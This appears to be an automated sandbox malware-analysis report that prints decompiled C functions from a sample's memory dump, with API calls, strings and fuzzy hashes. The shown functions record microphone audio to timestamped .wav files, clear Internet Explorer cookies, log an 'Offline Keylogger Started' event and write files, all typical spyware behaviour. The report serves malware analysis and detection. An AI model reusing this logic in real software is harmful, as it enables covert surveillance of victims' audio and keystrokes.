String ID: %02i:%02i:%02i:%03i [Info] $Connection KeepAlive enabled$Connection KeepAlive timeout: %i
API String ID: 2532271599-119634454
Opcode ID: 8ee760cb51e2548d8cf698a2bb99ee77555a9cdafb487fbccded744d68d8e1b0
Instruction ID: 8839a63a40ea3f829f2471e74f16db0bb127d6a6ee00dfe746f768c8e566295d
Opcode Fuzzy Hash: 8ee760cb51e2548d8cf698a2bb99ee77555a9cdafb487fbccded744d68d8e1b0
Instruction Fuzzy Hash: 2B314161900254BACB10EBA5CC0DEBFBBBCBF56715F44045AF441A2192EB7C9A86D770

Uniqueness

Uniqueness Score: -1.00%

Function 00741CEF, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00741CEF(void* __ebx, void* __edi, intOrPtr _a8) {
				char _v84;
				char _v112;
				void* _v116;
				char _v136;
				void* _v140;
				char _v160;
				void* _v164;
				char _v184;
				void* _v188;
				char _v204;
				char _v208;
				void* _v212;
				char _v228;
				char _v232;
				char _v236;
				void* __esi;
				void* _t29;
				intOrPtr _t43;
				void* _t75;

				_t47 = __ebx;
				_push(_t75);
				E00741F6D(__ebx,  &_v228);
				_t82 = _a8 - 0x3c0;
				if(_a8 == 0x3c0) {
					E007416F0();
					E007756B9( &_v84, 0x50, "%Y-%m-%d %H.%M", E007416E8());
					E00742084(__ebx,  &_v204,  &_v84);
					_t29 = E007572DA( &_v112,  &_v208);
					E00741EFA( &_v232, _t31, _t75, E007430A6(_t47,  &_v184, E00743030( &_v160, E00742FFA(__ebx,  &_v136, 0x7ac0e0, 0x5c), _t29), __edi, _t82, L".wav"));
					E00741EF0();
					E00741EF0();
					E00741EF0();
					E00741EF0();
					E00741FC7();
					E00741A64(E00741EEB( &_v236), 0x7aba78);
					waveInUnprepareHeader( *0x7abab0, 0x7aba78, 0x20);
					0x7aba78->lpData = E00741F95(0x7ac0f8);
					_t43 =  *0x7abab4; // 0x0
					 *0x7aba7c = _t43;
					 *0x7aba80 = 0;
					 *0x7aba84 = 0;
					 *0x7aba88 = 0;
					 *0x7aba8c = 0;
					waveInPrepareHeader( *0x7abab0, 0x7aba78, 0x20);
					waveInAddBuffer( *0x7abab0, 0x7aba78, 0x20);
				}
				return E00741EF0();
			}

0x00741cef
0x00741cff
0x00741d00
0x00741d05
0x00741d0c
0x00741d16
0x00741d34
0x00741d48
0x00741d5d
0x00741d91
0x00741d9a
0x00741da3
0x00741dac
0x00741db8
0x00741dc1
0x00741dd8
0x00741de6
0x00741df8
0x00741dfd
0x00741e09
0x00741e10
0x00741e15
0x00741e1a
0x00741e1f
0x00741e24
0x00741e33
0x00741e33
0x00741e46

APIs

_strftime.LIBCMT ref: 00741D34

Part of subcall function 00741A64: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00741ACC

waveInUnprepareHeader.WINMM(007ABA78,00000020,00000000,?), ref: 00741DE6
waveInPrepareHeader.WINMM(007ABA78,00000020), ref: 00741E24
waveInAddBuffer.WINMM(007ABA78,00000020), ref: 00741E33

Strings

.wav, xrefs: 00741D4D
%Y-%m-%d %H.%M, xrefs: 00741D25

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav
API String ID: 3809562944-3597965672
Opcode ID: f91f8fedf3b28d16a0f63b783aa9f9e85d97f5ca511f9dee1abcd9d43cbe5480
Instruction ID: dbf7b5710d2e340e2325ad077d685b11f11dbeafb6b1178a6a8e7b24ca9c4881
Opcode Fuzzy Hash: f91f8fedf3b28d16a0f63b783aa9f9e85d97f5ca511f9dee1abcd9d43cbe5480
Instruction Fuzzy Hash: C831A231514340DBC314FB20DC4AA9F77A9AB95301F80C529F55A865A2EF385A4ACB56

Uniqueness

Uniqueness Score: -1.00%

Function 0074A409, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0074A409(void* __eflags) {
				char _v28;
				char _v52;
				char _v76;
				char _v340;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t20;
				int _t34;
				void* _t40;
				void* _t41;
				char* _t42;
				void* _t48;
				char* _t55;
				void* _t59;
				void* _t61;
				void* _t62;

				_t42 =  &_v28;
				E007420D5(_t40, _t42);
				_push(_t42);
				_t41 = 0;
				_t17 = E007508E2( &_v52, 0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", "Cookies");
				_t62 = _t61 + 0xc;
				E00741FD1( &_v28, 0x80000001, _t59, _t17);
				E00741FC7();
				_t58 = 0x79f6bc;
				_t20 = E00745A6F(0x79f6bc);
				_t66 = _t20;
				if(_t20 == 0) {
					ExpandEnvironmentStringsA(E00741F95( &_v28),  &_v340, 0x104);
					__eflags = PathFileExistsA( &_v340);
					if(__eflags == 0) {
						goto L1;
					} else {
						E00742084(0,  &_v52,  &_v340);
						_t58 =  &_v52;
						_t34 = E00757754(E00741EEB(E007572DA( &_v76,  &_v52)));
						E00741EF0();
						_t55 =  &_v52;
						E00741FC7();
						__eflags = _t34;
						if(__eflags == 0) {
							_push(_t55);
							_push(_t55);
							__eflags = E0074A713();
							if(__eflags != 0) {
								_t41 = 1;
								E00742084(1, _t62 - 0x18, "\n[IE cookies cleared!]");
								E0074A6EF(1,  &_v52, __eflags);
								goto L8;
							}
						} else {
							_t48 = _t62 - 0x18;
							_push("\n[IE cookies cleared!]");
							goto L2;
						}
					}
				} else {
					L1:
					_t48 = _t62 - 0x18;
					_push("\n[IE cookies not found]");
					L2:
					E00742084(_t41, _t48);
					E0074A6EF(_t41, _t58, _t66);
					_t41 = 1;
					L8:
				}
				E00741FC7();
				return _t41;
			}

0x0074a412
0x0074a417
0x0074a41c
0x0074a42f
0x0074a431
0x0074a436
0x0074a43d
0x0074a445
0x0074a44a
0x0074a452
0x0074a457
0x0074a459
0x0074a48b
0x0074a49e
0x0074a4a0
0x00000000
0x0074a4a2
0x0074a4ac
0x0074a4b1
0x0074a4c5
0x0074a4cf
0x0074a4d4
0x0074a4d7
0x0074a4dc
0x0074a4de
0x0074a4ef
0x0074a4f0
0x0074a4f6
0x0074a4f8
0x0074a4fd
0x0074a506
0x0074a50b
0x00000000
0x0074a50b
0x0074a4e0
0x0074a4e3
0x0074a4e5
0x00000000
0x0074a4e5
0x0074a4de
0x0074a45b
0x0074a45b
0x0074a45e
0x0074a460
0x0074a465
0x0074a465
0x0074a46a
0x0074a46f
0x0074a510
0x0074a510
0x0074a516
0x0074a522

APIs

Part of subcall function 007508E2: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00750904
Part of subcall function 007508E2: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00750923
Part of subcall function 007508E2: RegCloseKey.ADVAPI32(?), ref: 0075092C

ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0074A48B
PathFileExistsA.SHLWAPI(?), ref: 0074A498

Strings

Cookies, xrefs: 0074A41D
[IE cookies cleared!], xrefs: 0074A4E5, 0074A501
Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, xrefs: 0074A422
[IE cookies not found], xrefs: 0074A460

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
API String ID: 1133728706-4073444585
Opcode ID: 4c4cf014e7c24d159fe27f9ebefa4c85a95b0c88ef7e40a373cdfd806efa05cc
Instruction ID: ca58edb71387a39e9d1b840c885d1f44f6acd3020ce8c08bfbe0b33c3a6de410
Opcode Fuzzy Hash: 4c4cf014e7c24d159fe27f9ebefa4c85a95b0c88ef7e40a373cdfd806efa05cc
Instruction Fuzzy Hash: 34217C71A40119EACB14F7F4DC5ECEE7768AF15300F840528F901A7192FF6DAA5AC692

Uniqueness

Uniqueness Score: -1.00%

Function 007901D3, Relevance: 10.6, APIs: 7, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E007901D3(char* _a4, short* _a8) {
				int _v8;
				void* __ecx;
				void* __esi;
				short* _t10;
				short* _t14;
				int _t15;
				short* _t16;
				void* _t26;
				int _t27;
				void* _t29;
				short* _t35;
				short* _t39;
				short* _t40;

				_push(_t29);
				if(_a4 != 0) {
					_t39 = _a8;
					__eflags = _t39;
					if(__eflags != 0) {
						_push(_t26);
						E007820AE(_t29, _t39, __eflags);
						asm("sbb ebx, ebx");
						_t35 = 0;
						_t27 = _t26 + 1;
						 *_t39 = 0;
						_t10 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, 0, 0);
						_v8 = _t10;
						__eflags = _t10;
						if(_t10 != 0) {
							_t40 = E0077F98C(_t29, _t10 + _t10);
							__eflags = _t40;
							if(_t40 != 0) {
								_t15 = MultiByteToWideChar(_t27, 0, _a4, 0xffffffff, _t40, _v8);
								__eflags = _t15;
								if(_t15 != 0) {
									_t16 = _t40;
									_t40 = 0;
									_t35 = 1;
									__eflags = 1;
									 *_a8 = _t16;
								} else {
									E0077A4CE(GetLastError());
								}
							}
							E007801F5(_t40);
							_t14 = _t35;
						} else {
							E0077A4CE(GetLastError());
							_t14 = 0;
						}
					} else {
						 *((intOrPtr*)(E0077A504())) = 0x16;
						E0077695D();
						_t14 = 0;
					}
					return _t14;
				}
				 *((intOrPtr*)(E0077A504())) = 0x16;
				E0077695D();
				return 0;
			}

0x007901d8
0x007901dd
0x007901f7
0x007901fa
0x007901fc
0x00790215
0x00790217
0x0079021e
0x00790220
0x00790229
0x0079022a
0x0079022e
0x00790234
0x00790237
0x00790239
0x00790253
0x00790256
0x00790258
0x00790265
0x0079026b
0x0079026d
0x00790281
0x00790283
0x00790287
0x00790287
0x00790288
0x0079026f
0x00790276
0x0079027b
0x0079026d
0x0079028b
0x00790290
0x0079023b
0x00790242
0x00790247
0x00790247
0x007901fe
0x00790203
0x00790209
0x0079020e
0x0079020e
0x00000000
0x00790295
0x007901e4
0x007901ea
0x00000000

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aafd695f09b2db8205d0f68b7308028616c589f39c20d6d88540a794455a8e9a
Instruction ID: 0e917d9889b0a7ef9db54e306208b2ee8283e37ceb1a3d593d3c0554bcc0e839
Opcode Fuzzy Hash: aafd695f09b2db8205d0f68b7308028616c589f39c20d6d88540a794455a8e9a
Instruction Fuzzy Hash: FE11E472514255FFDF206F75AC0D92F7B68FF867A07108665F829C7241DA3C8801C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 0074E7E5, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0074E7E5(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				char _v12;
				char _v24;
				void* __esi;
				intOrPtr _t40;
				void* _t48;
				intOrPtr* _t51;

				E00770058( &_v12, 0);
				_t48 =  *0x7adb84;
				_v8 = _t48;
				_t51 = E0074BA23(_a4, E0074B94C(0x7ab130));
				if(_t51 != 0) {
					L5:
					E007700B0( &_v12);
					return _t51;
				} else {
					if(_t48 == 0) {
						__eflags = E0074BB55(__ebx, __edx,  &_v8, _a4) - 0xffffffff;
						if(__eflags == 0) {
							E0074B812( &_v24);
							E0077205A( &_v24, 0x7a864c);
							asm("int3");
							_t40 =  *((intOrPtr*)( *[fs:0x2c]));
							__eflags =  *0x7adb78 -  *((intOrPtr*)(_t40 + 4));
							if( *0x7adb78 >  *((intOrPtr*)(_t40 + 4))) {
								_push(_t51);
								E0076F114(0x7adb78);
								__eflags =  *0x7adb78 - 0xffffffff;
								if( *0x7adb78 == 0xffffffff) {
									E0074EB9C();
									E0076F49E(__eflags, 0x792871);
									E0076F0D5(0x7adb78, 0x7adb78);
								}
							}
							return 0x7adb7c;
						} else {
							_t51 = _v8;
							 *0x7adb84 = _t51;
							 *((intOrPtr*)( *_t51 + 4))();
							E00770269(__eflags, _t51);
							goto L5;
						}
					} else {
						_t51 = _t48;
						goto L5;
					}
				}
			}

0x0074e7f2
0x0074e7f7
0x0074e802
0x0074e813
0x0074e817
0x0074e84b
0x0074e84e
0x0074e85a
0x0074e819
0x0074e81b
0x0074e82f
0x0074e832
0x0074e85e
0x0074e86c
0x0074e871
0x0074e878
0x0074e87f
0x0074e885
0x0074e887
0x0074e88e
0x0074e893
0x0074e89b
0x0074e89d
0x0074e8a7
0x0074e8ad
0x0074e8b3
0x0074e8b4
0x0074e8ba
0x0074e834
0x0074e834
0x0074e839
0x0074e841
0x0074e845
0x00000000
0x0074e84a
0x0074e81d
0x0074e81d
0x00000000
0x0074e81d
0x0074e81b

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0074E7F2
int.LIBCPMT ref: 0074E805

Part of subcall function 0074B94C: std::_Lockit::_Lockit.LIBCPMT ref: 0074B95D
Part of subcall function 0074B94C: std::_Lockit::~_Lockit.LIBCPMT ref: 0074B977

std::locale::_Getfacet.LIBCPMT ref: 0074E80E
std::_Facet_Register.LIBCPMT ref: 0074E845
std::_Lockit::~_Lockit.LIBCPMT ref: 0074E84E
__CxxThrowException@8.LIBVCRUNTIME ref: 0074E86C
__Init_thread_footer.LIBCMT ref: 0074E8AD

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetInit_thread_footerRegisterThrowstd::locale::_
String ID:
API String ID: 2409581025-0
Opcode ID: 437cfd0b91bd40380e5440fa223becc3d7d83d2b89b8b8c7b1823dbfcb0d622c
Instruction ID: e821397bce36c0c2f41de86e705c88d526ab89cf1277791fe200b0c2aeff26cf
Opcode Fuzzy Hash: 437cfd0b91bd40380e5440fa223becc3d7d83d2b89b8b8c7b1823dbfcb0d622c
Instruction Fuzzy Hash: CE21F676900114DFCB14FB68D84ADAD77ACAF81330B21416AF805A7692DF3C9D0187E1

Uniqueness

Uniqueness Score: -1.00%

Function 00749634, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 74
timeCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00749634(void* __ebx, void* __ecx, void* __eflags, char _a4) {
				struct _SYSTEMTIME _v20;
				char _v44;
				char _v68;
				void* __edi;
				void* __esi;
				WCHAR* _t33;
				void* _t65;
				void* _t67;
				void* _t70;

				_t70 = __eflags;
				_t42 = __ebx;
				_t67 = __ecx;
				GetLocalTime( &_v20);
				E00741EFA( &_a4, _t26, _t67, E007430A6(__ebx,  &_v44, E00749E69( &_v68, L"\r\n[%04i/%02i/%02i %02i:%02i:%02i ", _t70,  &_a4), _t65, _t70, L"]\r\n"));
				E00741EF0();
				E00741EF0();
				_push(0x64 + E00742489() * 2);
				_t33 = E007794F6( &_a4);
				_t66 = _t33;
				_push(_v20.wSecond & 0x0000ffff);
				_push(_v20.wMinute & 0x0000ffff);
				_push(_v20.wHour & 0x0000ffff);
				_push(_v20.wDay & 0x0000ffff);
				_push(_v20.wMonth & 0x0000ffff);
				_push(_v20.wYear & 0x0000ffff);
				wsprintfW(_t33, E00741EEB( &_a4));
				if( *((char*)(_t67 + 0x49)) != 0) {
					_t19 = _t67 + 4; // 0x7ac354
					E0074766C(__ebx, _t19, _t66, _t66);
				}
				if( *((char*)(_t67 + 0x4a)) != 0) {
					_t21 = _t67 + 0x1c; // 0x7ac36c
					E0074766C(_t42, _t21, _t66, _t66);
					_t22 = _t67 + 0x3c; // 0x0
					SetEvent( *_t22);
				}
				L007794F1(_t66);
				return E00741EF0();
			}

0x00749634
0x00749634
0x0074963f
0x00749642
0x0074966e
0x00749676
0x0074967e
0x00749692
0x00749693
0x0074969d
0x007496a3
0x007496a8
0x007496ad
0x007496b2
0x007496b7
0x007496b8
0x007496c3
0x007496d0
0x007496d3
0x007496d6
0x007496d6
0x007496df
0x007496e2
0x007496e5
0x007496ea
0x007496ed
0x007496ed
0x007496f4
0x00749707

APIs

GetLocalTime.KERNEL32(?,Offline Keylogger Started,007AC350), ref: 00749642

Part of subcall function 00749E69: char_traits.LIBCPMT ref: 00749E79

wsprintfW.USER32 ref: 007496C3
SetEvent.KERNEL32(00000000,00000000), ref: 007496ED

Strings

Offline Keylogger Started, xrefs: 0074963B
[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0074964B
], xrefs: 00749650

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: EventLocalTimechar_traitswsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
API String ID: 3003339404-248792730
Opcode ID: 1c8ef80517210609164a03fe910631969af0bb15b719a2d8a2c33d15d8bd342f
Instruction ID: 396380f95065da201bd9bf8aa5354f72b9f6ffab07a8408de1efa38508f6f3d1
Opcode Fuzzy Hash: 1c8ef80517210609164a03fe910631969af0bb15b719a2d8a2c33d15d8bd342f
Instruction Fuzzy Hash: 83217176400118AACB28FBA8EC598FF77B9AF04751B40811EF94652191EF7C6A86C764

Uniqueness

Uniqueness Score: -1.00%

Function 00756F19, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71
sleeplibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00756F19(void* __edx) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				void* _t25;
				void* _t26;
				void* _t27;
				void* _t29;
				void* _t30;
				void* _t40;
				intOrPtr* _t44;

				_t40 = __edx;
				_t44 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemTimes");
				 *_t44( &_v52,  &_v28,  &_v20);
				Sleep(0x3e8);
				 *_t44( &_v44,  &_v36,  &_v12);
				_t25 = E00756FCE( &_v12);
				_t26 = E00756FCE( &_v20);
				asm("sbb ebx, edx");
				_t27 = E00756FCE( &_v28);
				asm("sbb ebx, edx");
				_v8 = _t25 - _t26 - _t27 + E00756FCE( &_v36);
				asm("adc ebx, edx");
				_t29 = E00756FCE( &_v44);
				asm("sbb esi, edx");
				_t30 = E00756FCE( &_v52);
				asm("adc esi, edx");
				return E00790880(E00790840(_t25 - _t26 - _t27 + E00756FCE( &_v36) - _t29 + _t30, _t40, 0x64, 0), _t40, _v8, _t40);
			}

0x00756f19
0x00756f39
0x00756f47
0x00756f4e
0x00756f60
0x00756f65
0x00756f71
0x00756f7b
0x00756f7d
0x00756f87
0x00756f93
0x00756f96
0x00756f98
0x00756fa6
0x00756fa8
0x00756fb3
0x00756fcd

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,007ABACC,?,?,?,?,?,?,?,?,?,?,?,007535C0), ref: 00756F2C
GetProcAddress.KERNEL32(00000000), ref: 00756F33
Sleep.KERNEL32(000003E8,?,007ABACC,?,?,?,?,?,?,?,?,?,?,?,007535C0,00000095), ref: 00756F4E
__aulldiv.LIBCMT ref: 00756FC2

Strings

kernel32.dll, xrefs: 00756F27
GetSystemTimes, xrefs: 00756F22

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressHandleModuleProcSleep__aulldiv
String ID: GetSystemTimes$kernel32.dll
API String ID: 482274533-1354958348
Opcode ID: 5968120cd0a4291298f258f0c74a27b5dbe033a07af45deffed6d0fd20f7c9aa
Instruction ID: e787c5735541893d2e6c0bd1c0766e2751419953fb4b782a1f91551233a06eba
Opcode Fuzzy Hash: 5968120cd0a4291298f258f0c74a27b5dbe033a07af45deffed6d0fd20f7c9aa
Instruction Fuzzy Hash: EF114577D00218AADB14A7F4DC89DEF7B7CAB44751F040A26F905E3181ED785A08C6E0

Uniqueness

Uniqueness Score: -1.00%

Function 00757947, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69
fileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00757947(void* __ecx, long __edx, char _a4, long _a8) {
				void* _v8;
				long _v12;
				long _t10;
				long _t11;
				struct _OVERLAPPED* _t16;
				struct _OVERLAPPED* _t21;
				long _t24;
				long _t27;
				void* _t30;

				_push(__ecx);
				_push(__ecx);
				_t21 = 0;
				_v8 = __ecx;
				_t27 = __edx;
				_t10 = _a8;
				if(_t10 == 0) {
					_t11 = 0x40000000;
					_t24 = 2;
				} else {
					if(_t10 != 1) {
						_t11 = _a8;
						_t24 = _a8;
					} else {
						_t11 = 4;
						_t24 = _t11;
					}
				}
				_t5 =  &_a4; // 0x745d69
				_t30 = CreateFileW( *_t5, _t11, _t21, _t21, _t24, 0x80, _t21);
				if(_t30 != 0xffffffff) {
					if(_a8 != 1 || SetFilePointer(_t30, _t21, _t21, 2) != 0xffffffff) {
						if(WriteFile(_t30, _v8, _t27,  &_v12, _t21) != 0) {
							_t21 = 1;
						}
						CloseHandle(_t30);
						_t16 = _t21;
						goto L13;
					} else {
						CloseHandle(_t30);
						goto L6;
					}
				} else {
					L6:
					_t16 = 0;
					L13:
					return _t16;
				}
			}

0x0075794a
0x0075794b
0x00757951
0x00757953
0x00757957
0x00757959
0x0075795b
0x00757973
0x00757978
0x0075795d
0x00757960
0x00757969
0x0075796c
0x00757962
0x00757964
0x00757965
0x00757965
0x00757960
0x00757983
0x0075798c
0x00757991
0x0075799b
0x007579c8
0x007579ca
0x007579ca
0x007579cd
0x007579d3
0x00000000
0x007579ad
0x007579ae
0x00000000
0x007579ae
0x00757993
0x00757993
0x00757993
0x007579d5
0x007579db
0x007579db

APIs

CreateFileW.KERNEL32(i]t,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,00757A71,00000000,00000000), ref: 00757986
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00757A71,00000000,00000000,00000000,00000004,?,00745D69,00000000), ref: 007579A2
CloseHandle.KERNEL32(00000000,?,00757A71,00000000,00000000,00000000,00000004,?,00745D69,00000000), ref: 007579AE
WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,00757A71,00000000,00000000,00000000,00000004,?,00745D69,00000000), ref: 007579C0
CloseHandle.KERNEL32(00000000,?,00757A71,00000000,00000000,00000000,00000004,?,00745D69,00000000), ref: 007579CD

Strings

i]t, xrefs: 00757983

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerWrite
String ID: i]t
API String ID: 1852769593-3761946497
Opcode ID: 6af21efc6b8d9c4ac4ed13b0edb59242706cf7f1c018305b159325b553082e5b
Instruction ID: b613696a8d790cbdfc9e7582c44f279488b0d23f4a841ffea2312caf5ee92a3d
Opcode Fuzzy Hash: 6af21efc6b8d9c4ac4ed13b0edb59242706cf7f1c018305b159325b553082e5b
Instruction Fuzzy Hash: 1A110675208019BFEB184F64BC89EFA776CEB06372F108216FD15D6190C7B8AE09C674

Uniqueness

Uniqueness Score: -1.00%

Function 0078917A, Relevance: 10.6, APIs: 7, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0078917A(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00788EC1(_t45, 7);
					E00788EC1(_t45 + 0x1c, 7);
					E00788EC1(_t45 + 0x38, 0xc);
					E00788EC1(_t45 + 0x68, 0xc);
					E00788EC1(_t45 + 0x98, 2);
					E007801F5( *((intOrPtr*)(_t45 + 0xa0)));
					E007801F5( *((intOrPtr*)(_t45 + 0xa4)));
					E007801F5( *((intOrPtr*)(_t45 + 0xa8)));
					E00788EC1(_t45 + 0xb4, 7);
					E00788EC1(_t45 + 0xd0, 7);
					E00788EC1(_t45 + 0xec, 0xc);
					E00788EC1(_t45 + 0x11c, 0xc);
					E00788EC1(_t45 + 0x14c, 2);
					E007801F5( *((intOrPtr*)(_t45 + 0x154)));
					E007801F5( *((intOrPtr*)(_t45 + 0x158)));
					E007801F5( *((intOrPtr*)(_t45 + 0x15c)));
					return E007801F5( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}

0x00789180
0x00789185
0x0078918e
0x00789199
0x007891a4
0x007891af
0x007891bd
0x007891c8
0x007891d3
0x007891de
0x007891ec
0x007891fa
0x0078920b
0x00789219
0x00789227
0x00789232
0x0078923d
0x00789248
0x00000000
0x00789258
0x0078925d

APIs

Part of subcall function 00788EC1: _free.LIBCMT ref: 00788EEA

_free.LIBCMT ref: 007891C8

Part of subcall function 007801F5: HeapFree.KERNEL32(00000000,00000000,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?), ref: 0078020B
Part of subcall function 007801F5: GetLastError.KERNEL32(?,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?,?), ref: 0078021D

_free.LIBCMT ref: 007891D3
_free.LIBCMT ref: 007891DE
_free.LIBCMT ref: 00789232
_free.LIBCMT ref: 0078923D
_free.LIBCMT ref: 00789248
_free.LIBCMT ref: 00789253

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
Instruction ID: 43e0d2ef35dc0af02021f94f01ec38ccd2efc47d18976864a2c2f5a91a620bf8
Opcode Fuzzy Hash: 5569464c6c268c2a743bdaa509ba4960f6d5677ae10f9c6a881df30bb007768e
Instruction Fuzzy Hash: 8C11CC72DD0B08EEDAA0BBB0CC4EFCF779DAF04720F804815B399A6552DE79A5144791

Uniqueness

Uniqueness Score: -1.00%

Function 007750B5, Relevance: 10.6, APIs: 7, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E007750B5(void* __ecx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t25;
				void* _t28;

				if( *0x7aa090 != 0xffffffff) {
					_t25 = GetLastError();
					_t11 = E00771BD8(__eflags,  *0x7aa090);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00771C12(__eflags,  *0x7aa090, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t28 = E0077F348(_t16, 1, 0x28);
								__eflags = _t28;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00771C12(__eflags,  *0x7aa090, 0);
								} else {
									__eflags = E00771C12(__eflags,  *0x7aa090, _t28);
									if(__eflags != 0) {
										_t11 = _t28;
										_t28 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E007801F5(_t28);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t25);
					return _t11;
				} else {
					return 0;
				}
			}

0x007750bc
0x007750cf
0x007750d6
0x007750d9
0x007750dc
0x007750f5
0x007750f5
0x007750de
0x007750de
0x007750e0
0x007750ea
0x007750f0
0x007750f1
0x007750f3
0x00775103
0x00775107
0x00775109
0x0077511d
0x0077511d
0x00775126
0x0077510b
0x00775119
0x0077511b
0x0077512f
0x00775131
0x00775131
0x00000000
0x00000000
0x00000000
0x0077511b
0x00775134
0x00000000
0x00000000
0x00000000
0x007750f3
0x007750e0
0x0077513c
0x00775146
0x007750be
0x007750c0
0x007750c0

APIs

GetLastError.KERNEL32(?,?,007750AC,007721F2), ref: 007750C3
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007750D1
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007750EA
SetLastError.KERNEL32(00000000,?,007750AC,007721F2), ref: 0077513C

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 20d9fc86b905ef9c385fb1cea39458e19e8b3ad0a124504c0b7ea2581560bebe
Instruction ID: c7885d6492465b3a821f2650ddf4023db6ddbf643372940a099125423637d634
Opcode Fuzzy Hash: 20d9fc86b905ef9c385fb1cea39458e19e8b3ad0a124504c0b7ea2581560bebe
Instruction Fuzzy Hash: 7701D832149715EEAF562BBC6C8AA2B2755DB427F5760C229F11C410E1FF9D4C01A394

Uniqueness

Uniqueness Score: -1.00%

